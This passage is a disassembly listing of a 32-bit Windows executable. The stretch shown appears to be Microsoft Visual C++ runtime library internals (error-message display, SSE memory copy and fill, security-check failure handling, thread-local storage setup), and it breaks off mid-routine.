loc_405DB1: ; CODE XREF: sub_405D62+40�j
cmp ebx, 0FCh
jz loc_405EFC
push offset aRuntimeErrorPr ; "Runtime Error!\n\nProgram: "
mov ebx, 314h
push ebx
mov ebp, offset dword_411580
push ebp
call sub_404EAF
add esp, 0Ch
test eax, eax
jz short loc_405DE7
push esi
push esi
push esi
push esi
push esi
call sub_404D8F
add esp, 14h
loc_405DE7: ; CODE XREF: sub_405D62+76�j
push 104h
mov esi, offset byte_411599
push esi
push 0
mov byte_41169D, 0
call dword_40D0E0 ; GetModuleFileNameA
test eax, eax
jnz short loc_405E2B
push offset aProgramNameUnk ; "<program name unknown>"
push 2FBh
push esi
call sub_404EAF
add esp, 0Ch
test eax, eax
jz short loc_405E2B
xor eax, eax
push eax
push eax
push eax
push eax
push eax
call sub_404D8F
add esp, 14h
loc_405E2B: ; CODE XREF: sub_405D62+A1�j
; sub_405D62+B8�j
push esi
call sub_404F20
inc eax
cmp eax, 3Ch
pop ecx
jbe short loc_405E70
push esi
call sub_404F20
sub esi, 3Bh
add eax, esi
push 3
mov ecx, offset dword_411894
push offset a___ ; "..."
sub ecx, eax
push ecx
push eax
call sub_409993
add esp, 14h
test eax, eax
jz short loc_405E70
xor esi, esi
push esi
push esi
push esi
push esi
push esi
call sub_404D8F
add esp, 14h
jmp short loc_405E72
; ---------------------------------------------------------------------------
loc_405E70: ; CODE XREF: sub_405D62+D4�j
; sub_405D62+FB�j
xor esi, esi
loc_405E72: ; CODE XREF: sub_405D62+10C�j
push offset asc_40D800 ; "\n\n"
push ebx
push ebp
call sub_409922
add esp, 0Ch
test eax, eax
jz short loc_405E92
push esi
push esi
push esi
push esi
push esi
call sub_404D8F
add esp, 14h
loc_405E92: ; CODE XREF: sub_405D62+121�j
push off_41070C[edi*8]
push ebx
push ebp
call sub_409922
add esp, 0Ch
test eax, eax
jz short loc_405EB4
push esi
push esi
push esi
push esi
push esi
call sub_404D8F
add esp, 14h
loc_405EB4: ; CODE XREF: sub_405D62+143�j
push 12010h
push offset aMicrosoftVisua ; "Microsoft Visual C++ Runtime Library"
push ebp
call sub_409765
add esp, 0Ch
jmp short loc_405EFC
; ---------------------------------------------------------------------------
loc_405EC9: ; CODE XREF: sub_405D62+30�j
; sub_405D62+49�j
push 0FFFFFFF4h
call dword_40D14C ; GetStdHandle
mov ebp, eax
cmp ebp, esi
jz short loc_405EFC
cmp ebp, 0FFFFFFFFh
jz short loc_405EFC
push 0
lea eax, [esp+18h+var_4]
push eax
lea esi, ds:41070Ch[edi*8]
push dword ptr [esi]
call sub_404F20
pop ecx
push eax
push dword ptr [esi]
push ebp
call dword_40D148 ; WriteFile
loc_405EFC: ; CODE XREF: sub_405D62+55�j
; sub_405D62+165�j ...
pop ebp
loc_405EFD: ; CODE XREF: sub_405D62+1E�j
pop edi
pop esi
pop ebx
pop ecx
retn
sub_405D62 endp
; =============== S U B R O U T I N E =======================================
sub_405F02 proc near ; CODE XREF: sub_403B17+23�p
; sub_40422F�p ...
push 3
call sub_409A46
cmp eax, 1
pop ecx
jz short loc_405F24
push 3
call sub_409A46
test eax, eax
pop ecx
jnz short locret_405F3A
cmp dword_4105D0, 1
jnz short locret_405F3A
loc_405F24: ; CODE XREF: sub_405F02+B�j
push 0FCh
call sub_405D62
push 0FFh
call sub_405D62
pop ecx
pop ecx
locret_405F3A: ; CODE XREF: sub_405F02+17�j
; sub_405F02+20�j
retn
sub_405F02 endp
; =============== S U B R O U T I N E =======================================
sub_405F3B proc near ; CODE XREF: sub_4044FF+9�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov dword_411894, eax
retn
sub_405F3B endp
; =============== S U B R O U T I N E =======================================
sub_405F45 proc near ; CODE XREF: sub_403B17+8C�p
; sub_403B17+AE�p ...
arg_0 = dword ptr 4
push dword_411894
call sub_4062CC
test eax, eax
pop ecx
jz short loc_405F64
push [esp+arg_0]
call eax
test eax, eax
pop ecx
jz short loc_405F64
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_405F64: ; CODE XREF: sub_405F45+E�j
; sub_405F45+19�j
xor eax, eax
retn
sub_405F45 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_405F67 proc near ; CODE XREF: sub_405FEE+4D�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 8
mov [ebp+var_4], edi
mov [ebp+var_8], esi
mov esi, [ebp+arg_4]
mov edi, [ebp+arg_0]
mov ecx, [ebp+arg_8]
shr ecx, 7
jmp short loc_405F87
; ---------------------------------------------------------------------------
db 8Dh, 9Bh, 4 dup(0)
; ---------------------------------------------------------------------------
loc_405F87: ; CODE XREF: sub_405F67+18�j
; sub_405F67+7B�j
movdqa xmm0, oword ptr [esi]
movdqa xmm1, oword ptr [esi+10h]
movdqa xmm2, oword ptr [esi+20h]
movdqa xmm3, oword ptr [esi+30h]
movdqa oword ptr [edi], xmm0
movdqa oword ptr [edi+10h], xmm1
movdqa oword ptr [edi+20h], xmm2
movdqa oword ptr [edi+30h], xmm3
movdqa xmm4, oword ptr [esi+40h]
movdqa xmm5, oword ptr [esi+50h]
movdqa xmm6, oword ptr [esi+60h]
movdqa xmm7, oword ptr [esi+70h]
movdqa oword ptr [edi+40h], xmm4
movdqa oword ptr [edi+50h], xmm5
movdqa oword ptr [edi+60h], xmm6
movdqa oword ptr [edi+70h], xmm7
lea esi, [esi+80h]
lea edi, [edi+80h]
dec ecx
jnz short loc_405F87
mov esi, [ebp+var_8]
mov edi, [ebp+var_4]
mov esp, ebp
pop ebp
retn
sub_405F67 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_405FEE proc near ; CODE XREF: sub_403BE0+42�j
; sub_405FEE+AF�p ...
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 1Ch
mov [ebp+var_C], edi
mov [ebp+var_8], esi
mov [ebp+var_4], ebx
mov ebx, [ebp+arg_4]
mov eax, ebx
cdq
mov ecx, eax
mov eax, [ebp+arg_0]
xor ecx, edx
sub ecx, edx
and ecx, 0Fh
xor ecx, edx
sub ecx, edx
cdq
mov edi, eax
xor edi, edx
sub edi, edx
and edi, 0Fh
xor edi, edx
sub edi, edx
mov edx, ecx
or edx, edi
jnz short loc_406071
mov esi, [ebp+arg_8]
mov ecx, esi
and ecx, 7Fh
mov [ebp+var_18], ecx
cmp esi, ecx
jz short loc_406049
sub esi, ecx
push esi
push ebx
push eax
call sub_405F67
add esp, 0Ch
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_18]
loc_406049: ; CODE XREF: sub_405FEE+46�j
test ecx, ecx
jz short loc_4060C4
mov ebx, [ebp+arg_8]
mov edx, [ebp+arg_4]
add edx, ebx
sub edx, ecx
mov [ebp+var_14], edx
add ebx, eax
sub ebx, ecx
mov [ebp+var_10], ebx
mov esi, [ebp+var_14]
mov edi, [ebp+var_10]
mov ecx, [ebp+var_18]
rep movsb
mov eax, [ebp+arg_0]
jmp short loc_4060C4
; ---------------------------------------------------------------------------
loc_406071: ; CODE XREF: sub_405FEE+37�j
cmp ecx, edi
jnz short loc_4060AA
neg ecx
add ecx, 10h
mov [ebp+var_1C], ecx
mov esi, [ebp+arg_4]
mov edi, [ebp+arg_0]
mov ecx, [ebp+var_1C]
rep movsb
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_1C]
mov edx, [ebp+arg_4]
add edx, [ebp+var_1C]
mov eax, [ebp+arg_8]
sub eax, [ebp+var_1C]
push eax
push edx
push ecx
call sub_405FEE
add esp, 0Ch
mov eax, [ebp+arg_0]
jmp short loc_4060C4
; ---------------------------------------------------------------------------
loc_4060AA: ; CODE XREF: sub_405FEE+85�j
mov esi, [ebp+arg_4]
mov edi, [ebp+arg_0]
mov ecx, [ebp+arg_8]
mov edx, ecx
shr ecx, 2
rep movsd
mov ecx, edx
and ecx, 3
rep movsb
mov eax, [ebp+arg_0]
loc_4060C4: ; CODE XREF: sub_405FEE+5D�j
; sub_405FEE+81�j ...
mov ebx, [ebp+var_4]
mov esi, [ebp+var_8]
mov edi, [ebp+var_C]
mov esp, ebp
pop ebp
retn
sub_405FEE endp
; =============== S U B R O U T I N E =======================================
sub_4060D1 proc near ; DATA XREF: seg001:0040D228�o
and dword_413B80, 0
call sub_409ADC
mov dword_413B80, eax
xor eax, eax
retn
sub_4060D1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4060E5 proc near ; CODE XREF: sub_403F45:loc_403F4F�j
var_328 = dword ptr -328h
var_324 = dword ptr -324h
var_320 = dword ptr -320h
arg_0 = byte ptr 8
push ebp
mov ebp, esp
sub esp, 328h
mov dword_4119A8, eax
mov dword_4119A4, ecx
mov dword_4119A0, edx
mov dword_41199C, ebx
mov dword_411998, esi
mov dword_411994, edi
mov word_4119C0, ss
mov word_4119B4, cs
mov word_411990, ds
mov word_41198C, es
mov word_411988, fs
mov word_411984, gs
pushf
pop dword_4119B8
mov eax, [ebp+0]
mov dword_4119AC, eax
mov eax, [ebp+4]
mov dword_4119B0, eax
lea eax, [ebp+arg_0]
mov dword_4119BC, eax
mov eax, [ebp+var_320]
mov dword_4118F8, 10001h
mov eax, dword_4119B0
mov dword_4118AC, eax
mov dword_4118A0, 0C0000409h
mov dword_4118A4, 1
mov eax, dword_410440
mov [ebp+var_328], eax
mov eax, dword_410444
mov [ebp+var_324], eax
call dword_40D124 ; IsDebuggerPresent
mov dword_4118F0, eax
push 1
call sub_40931B
pop ecx
push 0
call dword_40D120 ; SetUnhandledExceptionFilter
push offset off_40D83C
call dword_40D11C ; UnhandledExceptionFilter
cmp dword_4118F0, 0
jnz short loc_4061D5
push 1
call sub_40931B
pop ecx
loc_4061D5: ; CODE XREF: sub_4060E5+E6�j
push 0C0000409h
call dword_40D118 ; GetCurrentProcess
push eax
call dword_40D0B0 ; TerminateProcess
leave
retn
sub_4060E5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4061E9 proc near ; CODE XREF: sub_406255+45�p
; sub_4062CC+45�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
push esi
xor esi, esi
lea eax, [ebp+var_4]
inc esi
xor ebx, ebx
push eax
mov [ebp+var_8], esi
mov [ebp+var_4], ebx
call sub_40430F
cmp [ebp+var_4], 5
pop ecx
jle short loc_40620F
mov eax, esi
jmp short loc_406251
; ---------------------------------------------------------------------------
loc_40620F: ; CODE XREF: sub_4061E9+20�j
push edi
push ebx
call dword_40D104 ; GetModuleHandleA
mov esi, [eax+3Ch]
add esi, eax
cmp [esi+6], bx
movzx eax, word ptr [esi+14h]
lea edi, [eax+esi+18h]
jbe short loc_40624D
loc_40622A: ; CODE XREF: sub_4061E9+5C�j
push edi
push offset dword_40D844
call sub_409B50
test eax, eax
pop ecx
pop ecx
jz short loc_406249
movzx eax, word ptr [esi+6]
inc ebx
add edi, 28h
cmp ebx, eax
jb short loc_40622A
jmp short loc_40624D
; ---------------------------------------------------------------------------
loc_406249: ; CODE XREF: sub_4061E9+50�j
and [ebp+var_8], 0
loc_40624D: ; CODE XREF: sub_4061E9+3F�j
; sub_4061E9+5E�j
mov eax, [ebp+var_8]
pop edi
loc_406251: ; CODE XREF: sub_4061E9+24�j
pop esi
pop ebx
leave
retn
sub_4061E9 endp
; =============== S U B R O U T I N E =======================================
sub_406255 proc near ; CODE XREF: sub_4044FF+3D�p
; sub_4062C3+2�p ...
arg_0 = dword ptr 4
push esi
push dword_4107C4
mov esi, dword_40D150
call esi ; TlsGetValue
test eax, eax
jz short loc_406289
mov eax, dword_4107C0
cmp eax, 0FFFFFFFFh
jz short loc_406289
push eax
push dword_4107C4
call esi ; TlsGetValue
call eax
test eax, eax
jz short loc_406289
mov eax, [eax+1F8h]
jmp short loc_4062AF
; ---------------------------------------------------------------------------
loc_406289: ; CODE XREF: sub_406255+11�j
; sub_406255+1B�j ...
push offset aKernel32_dll ; "KERNEL32.DLL"
call dword_40D104 ; GetModuleHandleA
mov esi, eax
test esi, esi
jz short loc_4062BD
call sub_4061E9
test eax, eax
jz short loc_4062BD
push offset aEncodepointer ; "EncodePointer"
push esi
call dword_40D100 ; GetProcAddress
loc_4062AF: ; CODE XREF: sub_406255+32�j
test eax, eax
jz short loc_4062BD
push [esp+4+arg_0]
call eax
mov [esp+4+arg_0], eax
loc_4062BD: ; CODE XREF: sub_406255+43�j
; sub_406255+4C�j ...
mov eax, [esp+4+arg_0]
pop esi
retn
sub_406255 endp
; =============== S U B R O U T I N E =======================================
sub_4062C3 proc near ; CODE XREF: sub_4043DD+6E�p
; sub_4044FF+1�p ...
push 0
call sub_406255
pop ecx
retn
sub_4062C3 endp
; =============== S U B R O U T I N E =======================================
sub_4062CC proc near ; CODE XREF: sub_40422F+14�p
; sub_4043DD+3D�p ...
arg_0 = dword ptr 4
push esi
push dword_4107C4
mov esi, dword_40D150
call esi ; TlsGetValue
test eax, eax
jz short loc_406300
mov eax, dword_4107C0
cmp eax, 0FFFFFFFFh
jz short loc_406300
push eax
push dword_4107C4
call esi ; TlsGetValue
call eax
test eax, eax
jz short loc_406300
mov eax, [eax+1FCh]
jmp short loc_406326
; ---------------------------------------------------------------------------
loc_406300: ; CODE XREF: sub_4062CC+11�j
; sub_4062CC+1B�j ...
push offset aKernel32_dll ; "KERNEL32.DLL"
call dword_40D104 ; GetModuleHandleA
mov esi, eax
test esi, esi
jz short loc_406334
call sub_4061E9
test eax, eax
jz short loc_406334
push offset aDecodepointer ; "DecodePointer"
push esi
call dword_40D100 ; GetProcAddress
loc_406326: ; CODE XREF: sub_4062CC+32�j
test eax, eax
jz short loc_406334
push [esp+4+arg_0]
call eax
mov [esp+4+arg_0], eax
loc_406334: ; CODE XREF: sub_4062CC+43�j
; sub_4062CC+4C�j ...
mov eax, [esp+4+arg_0]
pop esi
retn
sub_4062CC endp
; =============== S U B R O U T I N E =======================================
sub_40633A proc near ; DATA XREF: sub_406621+8A�o
; seg001:off_411BC4�o
call dword_40D154 ; TlsAlloc
retn 4
sub_40633A endp
; =============== S U B R O U T I N E =======================================
sub_406343 proc near ; CODE XREF: sub_406471+10�p
push esi
push dword_4107C4
call dword_40D150 ; TlsGetValue
mov esi, eax
test esi, esi
jnz short loc_406371
push dword_411BC8
call sub_4062CC
pop ecx
mov esi, eax
push esi
push dword_4107C4
call dword_40D158 ; TlsSetValue
loc_406371: ; CODE XREF: sub_406343+11�j
mov eax, esi
pop esi
retn
sub_406343 endp
; =============== S U B R O U T I N E =======================================
sub_406375 proc near ; CODE XREF: sub_406621+12�p
; sub_406621:loc_40679B�p
mov eax, dword_4107C0
cmp eax, 0FFFFFFFFh
jz short loc_406395
push eax
push dword_411BD0
call sub_4062CC
pop ecx
call eax
or dword_4107C0, 0FFFFFFFFh
loc_406395: ; CODE XREF: sub_406375+8�j
mov eax, dword_4107C4
cmp eax, 0FFFFFFFFh
jz short loc_4063AD
push eax
call dword_40D15C ; TlsFree
or dword_4107C4, 0FFFFFFFFh
loc_4063AD: ; CODE XREF: sub_406375+28�j
jmp sub_404FF4
sub_406375 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4063B2 proc near ; CODE XREF: sub_406471+4D�p
; sub_406621+162�p
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push 0Ch
push offset dword_40E558
call __SEH_prolog4
push offset aKernel32_dll ; "KERNEL32.DLL"
call dword_40D104 ; GetModuleHandleA
mov [ebp+var_1C], eax
mov esi, [ebp+arg_0]
mov dword ptr [esi+5Ch], offset dword_4107F8
xor edi, edi
inc edi
mov [esi+14h], edi
test eax, eax
jz short loc_40640F
call sub_4061E9
test eax, eax
jz short loc_40640F
push offset aEncodepointer ; "EncodePointer"
push [ebp+var_1C]
mov ebx, dword_40D100
call ebx ; GetProcAddress
mov [esi+1F8h], eax
push offset aDecodepointer ; "DecodePointer"
push [ebp+var_1C]
call ebx ; GetProcAddress
mov [esi+1FCh], eax
loc_40640F: ; CODE XREF: sub_4063B2+2C�j
; sub_4063B2+35�j
mov [esi+70h], edi
mov byte ptr [esi+0C8h], 43h
mov byte ptr [esi+14Bh], 43h
mov eax, offset dword_410880
mov [esi+68h], eax
push eax
call dword_40D160 ; InterlockedIncrement
push 0Ch
call sub_405121
pop ecx
and [ebp+ms_exc.disabled], 0
mov eax, [ebp+arg_4]
mov [esi+6Ch], eax
test eax, eax
jnz short loc_40644D
mov eax, off_410E88
mov [esi+6Ch], eax
loc_40644D: ; CODE XREF: sub_4063B2+91�j
push dword ptr [esi+6Ch]
call sub_408788
pop ecx
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
call sub_406468
call __SEH_epilog4
retn
sub_4063B2 endp
; =============== S U B R O U T I N E =======================================
sub_406468 proc near ; CODE XREF: sub_4063B2+AB�p
; DATA XREF: seg001:0040E570�o
push 0Ch
call sub_405049
pop ecx
retn
sub_406468 endp
; =============== S U B R O U T I N E =======================================
sub_406471 proc near ; CODE XREF: sub_403F8F�p sub_403FA2�p ...
push esi
push edi
call dword_40D050 ; RtlGetLastWin32Error
push dword_4107C0
mov edi, eax
call sub_406343
call eax
mov esi, eax
test esi, esi
jnz short loc_4064DC
push 214h
push 1
call sub_409363
mov esi, eax
test esi, esi
pop ecx
pop ecx
jz short loc_4064DC
push esi
push dword_4107C0
push dword_411BCC
call sub_4062CC
pop ecx
call eax
test eax, eax
jz short loc_4064D3
push 0
push esi
call sub_4063B2
pop ecx
pop ecx
call dword_40D168 ; GetCurrentThreadId
or dword ptr [esi+4], 0FFFFFFFFh
mov [esi], eax
jmp short loc_4064DC
; ---------------------------------------------------------------------------
loc_4064D3: ; CODE XREF: sub_406471+48�j
push esi
call sub_40405A
pop ecx
xor esi, esi
loc_4064DC: ; CODE XREF: sub_406471+1B�j
; sub_406471+2F�j ...
push edi
call dword_40D164 ; RtlRestoreLastWin32Error
pop edi
mov eax, esi
pop esi
retn
sub_406471 endp
; =============== S U B R O U T I N E =======================================
sub_4064E8 proc near ; CODE XREF: sub_40461A�p sub_404627�p ...
push esi
call sub_406471
mov esi, eax
test esi, esi
jnz short loc_4064FC
push 10h
call sub_40422F
pop ecx
loc_4064FC: ; CODE XREF: sub_4064E8+A�j
mov eax, esi
pop esi
retn
sub_4064E8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406500 proc near ; DATA XREF: sub_406621+115�o
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
push 8
push offset dword_40E578
call __SEH_prolog4
mov esi, [ebp+arg_0]
test esi, esi
jz loc_406601
mov eax, [esi+24h]
test eax, eax
jz short loc_406525
push eax
call sub_40405A
pop ecx
loc_406525: ; CODE XREF: sub_406500+1C�j
mov eax, [esi+2Ch]
test eax, eax
jz short loc_406533
push eax
call sub_40405A
pop ecx
loc_406533: ; CODE XREF: sub_406500+2A�j
mov eax, [esi+34h]
test eax, eax
jz short loc_406541
push eax
call sub_40405A
pop ecx
loc_406541: ; CODE XREF: sub_406500+38�j
mov eax, [esi+3Ch]
test eax, eax
jz short loc_40654F
push eax
call sub_40405A
pop ecx
loc_40654F: ; CODE XREF: sub_406500+46�j
mov eax, [esi+44h]
test eax, eax
jz short loc_40655D
push eax
call sub_40405A
pop ecx
loc_40655D: ; CODE XREF: sub_406500+54�j
mov eax, [esi+48h]
test eax, eax
jz short loc_40656B
push eax
call sub_40405A
pop ecx
loc_40656B: ; CODE XREF: sub_406500+62�j
mov eax, [esi+5Ch]
cmp eax, offset dword_4107F8
jz short loc_40657C
push eax
call sub_40405A
pop ecx
loc_40657C: ; CODE XREF: sub_406500+73�j
push 0Dh
call sub_405121
pop ecx
and [ebp+ms_exc.disabled], 0
mov edi, [esi+68h]
test edi, edi
jz short loc_4065A9
push edi
call dword_40D16C ; InterlockedDecrement
test eax, eax
jnz short loc_4065A9
cmp edi, offset dword_410880
jz short loc_4065A9
push edi
call sub_40405A
pop ecx
loc_4065A9: ; CODE XREF: sub_406500+8D�j
; sub_406500+98�j ...
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
call sub_40660C
push 0Ch
call sub_405121
pop ecx
mov [ebp+ms_exc.disabled], 1
mov edi, [esi+6Ch]
test edi, edi
jz short loc_4065EE
push edi
call sub_40880E
pop ecx
cmp edi, off_410E88
jz short loc_4065EE
cmp edi, offset dword_410DB0
jz short loc_4065EE
cmp dword ptr [edi], 0
jnz short loc_4065EE
push edi
call sub_408648
pop ecx
loc_4065EE: ; CODE XREF: sub_406500+C9�j
; sub_406500+D8�j ...
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
call sub_406618
push esi
call sub_40405A
pop ecx
loc_406601: ; CODE XREF: sub_406500+11�j
call __SEH_epilog4
retn 4
sub_406500 endp
; =============== S U B R O U T I N E =======================================
sub_406609 proc near ; DATA XREF: seg001:0040E590�o
mov esi, [ebp+8]
sub_406609 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_40660C proc near ; CODE XREF: sub_406500+B0�p
push 0Dh
call sub_405049
pop ecx
retn
sub_40660C endp
; =============== S U B R O U T I N E =======================================
sub_406615 proc near ; DATA XREF: seg001:0040E59C�o
mov esi, [ebp+8]
sub_406615 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_406618 proc near ; CODE XREF: sub_406500+F5�p
push 0Ch
call sub_405049
pop ecx
retn
sub_406618 endp
; =============== S U B R O U T I N E =======================================
sub_406621 proc near ; CODE XREF: seg001:loc_404C7E�p
push edi
push offset aKernel32_dll ; "KERNEL32.DLL"
call dword_40D104 ; GetModuleHandleA
mov edi, eax
test edi, edi
jnz short loc_40663C
call sub_406375
xor eax, eax
pop edi
retn
; ---------------------------------------------------------------------------
loc_40663C: ; CODE XREF: sub_406621+10�j
push esi
mov esi, dword_40D100
push offset dword_40D89C
push edi
call esi ; GetProcAddress
push offset aFlsgetvalue ; "FlsGetValue"
push edi
mov off_411BC4, eax
call esi ; GetProcAddress
push offset aFlssetvalue ; "FlsSetValue"
push edi
mov dword_411BC8, eax
call esi ; GetProcAddress
push offset aFlsfree ; "FlsFree"
push edi
mov dword_411BCC, eax
call esi ; GetProcAddress
cmp off_411BC4, 0
mov esi, dword_40D158
mov dword_411BD0, eax
jz short loc_40669C
cmp dword_411BC8, 0
jz short loc_40669C
cmp dword_411BCC, 0
jz short loc_40669C
test eax, eax
jnz short loc_4066C0
loc_40669C: ; CODE XREF: sub_406621+63�j
; sub_406621+6C�j ...
mov eax, dword_40D150
mov dword_411BC8, eax
mov eax, dword_40D15C
mov off_411BC4, offset sub_40633A
mov dword_411BCC, esi
mov dword_411BD0, eax
loc_4066C0: ; CODE XREF: sub_406621+79�j
call dword_40D154 ; TlsAlloc
cmp eax, 0FFFFFFFFh
mov dword_4107C4, eax
jz loc_4067A0
push dword_411BC8
push eax
call esi ; TlsSetValue
test eax, eax
jz loc_4067A0
call sub_4044FF
push off_411BC4
call sub_406255
push dword_411BC8
mov off_411BC4, eax
call sub_406255
push dword_411BCC
mov dword_411BC8, eax
call sub_406255
push dword_411BD0
mov dword_411BCC, eax
call sub_406255
add esp, 10h
mov dword_411BD0, eax
call sub_404FAB
test eax, eax
jz short loc_40679B
push offset sub_406500
push off_411BC4
call sub_4062CC
pop ecx
call eax ; TlsFree
cmp eax, 0FFFFFFFFh
mov dword_4107C0, eax
jz short loc_40679B
push 214h
push 1
call sub_409363
mov esi, eax
test esi, esi
pop ecx
pop ecx
jz short loc_40679B
push esi
push dword_4107C0
push dword_411BCC
call sub_4062CC
pop ecx
call eax ; TlsFree
test eax, eax
jz short loc_40679B
push 0
push esi
call sub_4063B2
pop ecx
pop ecx
call dword_40D168 ; GetCurrentThreadId
or dword ptr [esi+4], 0FFFFFFFFh
mov [esi], eax
xor eax, eax
inc eax
jmp short loc_4067A2
; ---------------------------------------------------------------------------
loc_40679B: ; CODE XREF: sub_406621+113�j
; sub_406621+130�j ...
call sub_406375
loc_4067A0: ; CODE XREF: sub_406621+AD�j
; sub_406621+BE�j
xor eax, eax
loc_4067A2: ; CODE XREF: sub_406621+178�j
pop esi
pop edi
retn
sub_406621 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4067A5 proc near ; CODE XREF: seg001:0040167B�p
; seg001:00401684�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ecx
lea eax, [ebp+var_8]
push eax
call dword_40D170 ; GetSystemTimeAsFileTime
mov eax, [ebp+var_8]
mov ecx, [ebp+var_4]
push 0
add eax, 2AC18000h
push 989680h
adc ecx, 0FE624E21h
push ecx
push eax
call sub_409BE0
mov ecx, [ebp+arg_0]
test ecx, ecx
jz short locret_4067DC
mov [ecx], eax
locret_4067DC: ; CODE XREF: sub_4067A5+33�j
leave
retn
sub_4067A5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4067DE proc near ; CODE XREF: sub_406835+31�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 4
mov [ebp+var_4], edi
mov edi, [ebp+arg_0]
mov ecx, [ebp+arg_4]
shr ecx, 7
pxor xmm0, xmm0
jmp short loc_4067FE
; ---------------------------------------------------------------------------
db 8Dh, 0A4h, 24h, 4 dup(0)
align 2
loc_4067FE: ; CODE XREF: sub_4067DE+16�j
; sub_4067DE+4E�j
movdqa oword ptr [edi], xmm0
movdqa oword ptr [edi+10h], xmm0
movdqa oword ptr [edi+20h], xmm0
movdqa oword ptr [edi+30h], xmm0
movdqa oword ptr [edi+40h], xmm0
movdqa oword ptr [edi+50h], xmm0
movdqa oword ptr [edi+60h], xmm0
movdqa oword ptr [edi+70h], xmm0
lea edi, [edi+80h]
dec ecx
jnz short loc_4067FE
mov edi, [ebp+var_4]
mov esp, ebp
pop ebp
retn
sub_4067DE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406835 proc near ; CODE XREF: sub_403FE0+27�j
; sub_406835+7D�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 10h
mov [ebp+var_4], edi
mov eax, [ebp+arg_0]
cdq
mov edi, eax
xor edi, edx
sub edi, edx
and edi, 0Fh
xor edi, edx
sub edi, edx
test edi, edi
jnz short loc_40688F
mov ecx, [ebp+arg_8]
mov edx, ecx
and edx, 7Fh
mov [ebp+var_C], edx
cmp ecx, edx
jz short loc_406874
sub ecx, edx
push ecx
push eax
call sub_4067DE
add esp, 8
mov eax, [ebp+arg_0]
mov edx, [ebp+var_C]
loc_406874: ; CODE XREF: sub_406835+2B�j
test edx, edx
jz short loc_4068BD
add eax, [ebp+arg_8]
sub eax, edx
mov [ebp+var_8], eax
xor eax, eax
mov edi, [ebp+var_8]
mov ecx, [ebp+var_C]
rep stosb
mov eax, [ebp+arg_0]
jmp short loc_4068BD
; ---------------------------------------------------------------------------
loc_40688F: ; CODE XREF: sub_406835+1C�j
neg edi
add edi, 10h
mov [ebp+var_10], edi
xor eax, eax
mov edi, [ebp+arg_0]
mov ecx, [ebp+var_10]
rep stosb
mov eax, [ebp+var_10]
mov ecx, [ebp+arg_0]
mov edx, [ebp+arg_8]
add ecx, eax
sub edx, eax
push edx
push 0
push ecx
call sub_406835
add esp, 0Ch
mov eax, [ebp+arg_0]
loc_4068BD: ; CODE XREF: sub_406835+41�j
; sub_406835+58�j
mov edi, [ebp+var_4]
mov esp, ebp
pop ebp
retn
sub_406835 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4068C4 proc near ; CODE XREF: sub_4040E8+A3�p
; sub_4041B4+6E�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push esi
mov esi, [ebp+arg_4]
push esi
call sub_40A6C9
mov [ebp+arg_4], eax
mov eax, [esi+0Ch]
test al, 82h
pop ecx
jnz short loc_4068F4
call sub_403F8F
mov dword ptr [eax], 9
loc_4068E8: ; CODE XREF: sub_4068C4+3F�j
or dword ptr [esi+0Ch], 20h
or eax, 0FFFFFFFFh
jmp loc_406A21
; ---------------------------------------------------------------------------
loc_4068F4: ; CODE XREF: sub_4068C4+17�j
test al, 40h
jz short loc_406905
call sub_403F8F
mov dword ptr [eax], 22h
jmp short loc_4068E8
; ---------------------------------------------------------------------------
loc_406905: ; CODE XREF: sub_4068C4+32�j
push ebx
xor ebx, ebx
test al, 1
jz short loc_406922
test al, 10h
mov [esi+4], ebx
jz loc_40699C
mov ecx, [esi+8]
and eax, 0FFFFFFFEh
mov [esi], ecx
mov [esi+0Ch], eax
loc_406922: ; CODE XREF: sub_4068C4+46�j
mov eax, [esi+0Ch]
and eax, 0FFFFFFEFh
or eax, 2
test ax, 10Ch
mov [esi+0Ch], eax
mov [esi+4], ebx
mov [ebp+var_4], ebx
jnz short loc_406966
call sub_40A528
add eax, 20h
cmp esi, eax
jz short loc_406952
call sub_40A528
add eax, 40h
cmp esi, eax
jnz short loc_40695F
loc_406952: ; CODE XREF: sub_4068C4+80�j
